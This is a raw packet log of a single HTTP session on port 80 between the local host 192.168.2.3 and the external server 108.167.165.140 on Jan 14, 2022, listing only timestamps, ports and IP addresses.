Jan 14, 2022 13:49:25.932080984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932089090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932105064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932112932 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932128906 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932133913 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932152987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932156086 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932177067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932180882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932199955 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932204962 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932220936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932231903 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932243109 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932252884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932265043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932277918 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932287931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932302952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932313919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932326078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932337046 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932348967 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932360888 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932373047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932384014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932395935 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932408094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932420969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932432890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932441950 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932456017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932466984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932480097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932491064 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932502985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932514906 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932526112 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932538033 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932549000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932564974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932574034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932589054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932596922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932621002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932631016 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932643890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932666063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932667971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932693005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932699919 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932714939 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932735920 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932738066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932760954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932770014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932777882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932800055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932811975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932823896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932847023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932852030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932869911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932882071 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932885885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932893038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932915926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932920933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932940960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932951927 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.932965040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932987928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.932990074 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933010101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933027029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933033943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933058023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933063030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933079958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933099031 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933103085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933124065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933124065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933146954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933157921 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933170080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933180094 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933192968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933202982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933214903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933224916 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933239937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933248043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933264017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933270931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933286905 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933295965 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933309078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933316946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933331966 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933340073 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933356047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933363914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933379889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933388948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933403015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933410883 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933425903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933435917 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933449030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933458090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933471918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933481932 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933494091 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933505058 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933516979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933527946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933542967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933556080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933567047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933579922 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933590889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933602095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933614016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933625937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933635950 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933649063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933659077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933671951 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933681011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933696985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933702946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933722973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933727026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933749914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933763027 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933774948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933799028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933799982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933820009 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933831930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933836937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933845043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933881998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933886051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933908939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933912992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933936119 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933945894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933959007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933970928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.933981895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.933994055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.934005022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.934020042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.934027910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.934041977 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.934050083 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.934067011 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.934072971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.934097052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.934097052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.934120893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.934134960 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.934170961 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.934988022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.938049078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081023932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081065893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081090927 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081111908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081135035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081156969 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081178904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081182957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081207991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081208944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081224918 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081239939 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081264019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081268072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081283092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081290007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081305027 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081311941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081336975 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081355095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081361055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081384897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081387043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081410885 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081418991 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081433058 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081442118 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081456900 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081459045 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081475973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081480980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081495047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081504107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081520081 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081528902 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081545115 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081554890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081566095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081581116 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081604958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081604958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081629992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081630945 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081654072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081656933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081670046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081681013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081696987 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081703901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081716061 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081729889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081753016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081778049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081805944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081829071 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081866026 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081870079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081899881 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081902027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081902981 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.081932068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081953049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081976891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.081978083 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082000971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082011938 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082024097 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082046032 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082048893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082061052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082075119 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082091093 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082102060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082113028 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082123995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082145929 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082169056 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082170010 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082192898 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082195997 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082217932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082226038 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082242012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082242966 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082266092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082268953 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082289934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082292080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082314968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082314968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082334995 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082340956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082355976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082366943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082377911 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082391977 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082416058 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082418919 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082438946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082444906 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082463026 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082463980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082489967 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082490921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082503080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082515955 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082528114 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082540989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082555056 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082565069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082585096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082587957 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082602978 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082613945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082623005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082639933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082663059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082678080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082688093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082707882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082710981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082736015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082741022 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082758904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082760096 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082779884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082784891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082798958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082807064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082822084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082830906 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082853079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082870007 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082876921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.082901001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.082936049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.084861040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.085095882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.229387045 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.229409933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.229422092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.229440928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.229458094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.229485989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.229593039 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.229602098 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.229947090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.229967117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.229990959 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230012894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230014086 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230031967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230057955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230062962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230093002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230093956 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230117083 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230133057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230146885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230150938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230168104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230185986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230202913 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230204105 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230220079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230223894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230227947 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230237961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230249882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230254889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230273962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230287075 CET	49743	80	192.168.2.3	108.167.165.140
